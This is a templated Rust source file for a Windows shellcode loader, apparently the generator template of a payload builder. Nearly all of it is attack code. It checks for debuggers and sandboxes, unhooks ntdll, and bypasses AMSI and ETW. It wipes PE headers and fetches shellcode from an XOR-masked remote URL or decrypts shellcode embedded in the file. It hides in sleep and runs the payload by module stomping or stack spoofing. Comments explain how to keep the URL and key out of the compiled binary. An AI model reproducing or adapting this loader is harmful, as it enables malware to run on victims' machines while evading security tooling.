#![windows_subsystem = "windows"]
extern crate scaffold;

fn {{ v.fn_run }}() {
    unsafe {
        {%- if "AntiDebug" in feature_names %}
        if scaffold::evasion::anti_debug::is_debugged() { return; }
        {%- endif %}
        {%- if "SandboxDomain" in feature_names %}
        if !scaffold::sandbox::domain::is_domain_joined() { return; }
        {%- endif %}
        {%- if "SandboxUser" in feature_names %}
        if !scaffold::sandbox::usercheck::looks_real() { return; }
        {%- endif %}
        {%- if "UnhookDisk" in feature_names %}
        scaffold::evasion::unhook::unhook_ntdll_disk();
        {%- endif %}
        {%- if "UnhookKnownDlls" in feature_names %}
        scaffold::evasion::unhook::unhook_ntdll_knowndlls();
        {%- endif %}
        {%- if "AmsiHwbp" in feature_names %}
        scaffold::bypass::amsi_hwbp::install_amsi_bypass();
        {%- endif %}
        {%- if "EtwHwbp" in feature_names %}
        scaffold::bypass::etw_hwbp::install_etw_bypass();
        scaffold::bypass::etw_hwbp::patch_etw_full();
        {%- endif %}
        {%- if "PeCloak" in feature_names %}
        scaffold::evasion::pe_cloak::wipe_pe_headers();
        {%- endif %}

        {%- if is_staged %}
        // Staged fetch: URL/JWT/User-Agent are XOR-masked per-build, decoded just before
        // the fetch. Network call uses WinHTTP (no Rust HTTP-client signatures in the
        // binary). Response body is the *raw* shellcode (transport encryption via HTTPS).
        // `black_box` defeats rustc's constant-folding of the XOR loop — without it the
        // optimizer would pre-compute the plaintext URL into rodata.
        let mut {{ sg.sg_lv_url }}: [u8; {{ staged_url_len }}] = [
            {%- for b in staged_url_enc %}{{ b }},{% endfor %}
        ];
        let {{ sg.sg_lv_url }}_k = core::hint::black_box({{ staged_url_xk }}_u8);
        for {{ sg.sg_lv_i }} in &mut {{ sg.sg_lv_url }} { *{{ sg.sg_lv_i }} ^= {{ sg.sg_lv_url }}_k; }
        let mut {{ sg.sg_lv_jwt }}: [u8; {{ staged_jwt_len }}] = [
            {%- for b in staged_jwt_enc %}{{ b }},{% endfor %}
        ];
        let {{ sg.sg_lv_jwt }}_k = core::hint::black_box({{ staged_jwt_xk }}_u8);
        for {{ sg.sg_lv_i }} in &mut {{ sg.sg_lv_jwt }} { *{{ sg.sg_lv_i }} ^= {{ sg.sg_lv_jwt }}_k; }
        let mut {{ sg.sg_lv_ua }}: [u8; {{ staged_ua_len }}] = [
            {%- for b in staged_ua_enc %}{{ b }},{% endfor %}
        ];
        let {{ sg.sg_lv_ua }}_k = core::hint::black_box({{ staged_ua_xk }}_u8);
        for {{ sg.sg_lv_i }} in &mut {{ sg.sg_lv_ua }} { *{{ sg.sg_lv_i }} ^= {{ sg.sg_lv_ua }}_k; }
        let {{ v.var_ptr }} = match scaffold::stager::fetch(
            core::str::from_utf8(&{{ sg.sg_lv_url }}).unwrap_or(""),
            core::str::from_utf8(&{{ sg.sg_lv_jwt }}).unwrap_or(""),
            core::str::from_utf8(&{{ sg.sg_lv_ua }}).unwrap_or(""),
        ) { Some(b) => b, None => return };
        // Zeroise sensitive buffers
        for {{ sg.sg_lv_i }} in &mut {{ sg.sg_lv_jwt }} { *{{ sg.sg_lv_i }} = 0; }
        for {{ sg.sg_lv_i }} in &mut {{ sg.sg_lv_url }} { *{{ sg.sg_lv_i }} = 0; }
        {%- else %}
        let {{ v.var_shellcode }}: &[u8] = &[
            {%- for byte in config.shellcode_hex | hex_bytes %}{{ byte }},{% endfor %}
        ];
        let mut {{ v.var_key }}: [u8; 32] = [
            {%- for byte in masked_key_bytes %}{{ byte }},{% endfor %}
        ];
        // black_box prevents rustc from constant-folding the XOR back to plaintext
        let {{ v.var_key }}_t = core::hint::black_box({{ key_tweak }}_u8);
        for {{ v.bin_lv_ki }} in &mut {{ v.var_key }} { *{{ v.bin_lv_ki }} ^= {{ v.var_key }}_t; }
        let {{ v.var_iv }}: [u8; 16] = [
            {%- for byte in config.iv_hex | hex_bytes %}{{ byte }},{% endfor %}
        ];

        {%- if config.encryption == "Aes256" %}
        let {{ v.var_ptr }} = scaffold::crypto::decrypt_aes256(
            {{ v.var_shellcode }}, &{{ v.var_key }}, &{{ v.var_iv }}
        ).unwrap();
        {%- else %}
        let {{ v.var_ptr }} = scaffold::crypto::decrypt_chacha20(
            {{ v.var_shellcode }}, &{{ v.var_key }}, &{{ v.var_iv }}
        ).unwrap();
        {%- endif %}
        {%- endif %}

        {%- if "SleepEncrypt" in feature_names %}
        scaffold::evasion::sleep_mask::masked_sleep_jitter(3000);
        {%- endif %}

        {%- if "ModuleStomp" in feature_names %}
        scaffold::inject::exec::run_stomped(&{{ v.var_ptr }});
        {%- elif "StackSpoof" in feature_names %}
        scaffold::inject::exec::run_no_rwx_spoof(&{{ v.var_ptr }});
        {%- else %}
        scaffold::inject::exec::run_no_rwx(&{{ v.var_ptr }});
        {%- endif %}
    }
}

fn main() { {{ v.fn_run }}(); }
